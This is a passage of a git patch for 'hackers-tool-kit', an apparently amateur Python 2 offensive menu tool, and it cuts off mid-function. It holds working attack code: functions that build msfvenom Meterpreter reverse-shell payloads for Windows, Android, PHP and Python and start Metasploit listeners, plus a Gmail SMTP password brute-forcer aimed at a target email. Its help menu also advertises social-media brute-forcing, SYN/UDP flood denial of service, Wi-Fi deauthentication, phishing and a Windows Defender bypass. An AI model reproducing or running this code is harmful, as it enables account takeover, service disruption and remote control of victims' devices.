{0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#CLEAR ALL START# -#---------------# -def clearall(): - os.system("clear") -#-------------# -#CLEAR ALL END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#REFRESH BANNER START# -#--------------------# -def banner(): - os.system("clear") - mainbanner() -#------------------# -#REFRESH BANNER END# - - -#PHP PAYLOAD START# -#-----------------# -def phpload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> phpload.rc') - os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') - os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) - os.system('echo "exploit\n" >> phpload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r phpload.rc') - os.system('rm -rf phpload.rc') - if yn == "n": - os.system('echo " "') -#---------------# -#PHP PAYLOAD END# - - -#PYLOAD START# -#------------# -def pyload(): - lhost = raw_input("LHOST: ") - lport = raw_input("LPORT: ") - filen = raw_input("File Name: ") - a = 'msfvenom -p python/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.py'.format(lhost,lport,filen) - os.system(a) - print "\nwould you like to run this file in a multi handler?" - yn = raw_input("[y/n]> ") - if yn == "y": - os.system('echo "use exploit/multi/handler\n" >> pyload.rc') - os.system('echo "set payload python/meterpreter/reverse_tcp\n" >> pyload.rc') - os.system('echo "set LHOST {0}\n" >> pyload.rc'.format(lhost)) - os.system('echo "set LPORT {0}\n" >> pyload.rc'.format(lport)) - os.system('echo "exploit\n" >> pyload.rc') - os.system("service postgresql restart") - os.system('msfconsole -r pyload.rc') - os.system('rm -rf pyload.rc') - if yn == "n": - os.system('echo " "') -#----------# -#PYLOAD END# - - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "about": - about() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - if x == "banner": - banner() - if x == "phpload": - phpload() - if x == "pyload": - pyload() - found = True -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From e49d53272961a6fd8b2000316989e259147812d3 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Mon, 20 May 2019 03:56:35 +0100 Subject: [PATCH 143/214] Add files via upload --- htk.py | 2824 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2824 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..be93f7a --- /dev/null +++ b/htk.py @@ -0,0 +1,2824 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """ + type ? for help +\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + type ? for help + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + + type ? for help + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[91m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + type ? for help + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner8(): + print """ + type ? for help\033[91m + +@@@ /$$ /$$ @@@ +@@@ | $$ | $$ @@@ +@@! | $$ | $$ @@! +!@! | $$$$$$$$ !@! +!!@ | $$__ $$ !!@ +!!! | $$ | $$ !!! +!!: | $$ | $$ !!: +:!: |__/ |__/ :!: +@@@ @@@\033[94m +@@@ @@@ +@@! @@! +!@! /$$$$$$$$ !@! +!!@ |__ $$__/ !!@ +!!! | $$ !!! +!!: | $$ !!: +:!:---------------| $$---------------:!: +@@@ | $$ @@@ +@@@ | $$ @@@ +@@! |__/ @@! +!@! !@!\033[91m +!!@ !!@ +!!! /$$ /$$ !!! +!!: | $$ /$$/ !!: +:!: | $$ /$$/ :!: +@@@ | $$$$$/ @@@ +@@@ | $$ $$ @@@ +@@! | $$\ $$ @@! +!@! | $$ \ $$ !@! +!!@ |__/ \__/ !!@ +!!! !!! +!!: !!: +:!: :!:\033[92m + :: :: +: @tuf_unkn0wn :\033[0m +""" +def mainbanner9(): + print """ +\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ +║ ║ +\033[33m║ ║ +║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ +\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ +║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ +\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ +║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ +\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ +║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ +\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ +║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ +\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ +║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ +\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ +║\033[0m █ ▐ ▀ █ ▐ \033[95m║ +\033[35m║\033[0m ▐ ▐ \033[35m║ +║ ║\033[1;31m +╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m + type ? for help + """.decode('utf-8') + + +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,9) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() + if num == 8: + mainbanner8() + if num == 9: + mainbanner9() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +clear : clears screen except for banner +clearall: clears everything on screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +phpload : make a php reverse_tcp payload and start it in a multi handler +pyload : make a python reverse_tcp payload and start it in a multi handler +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap 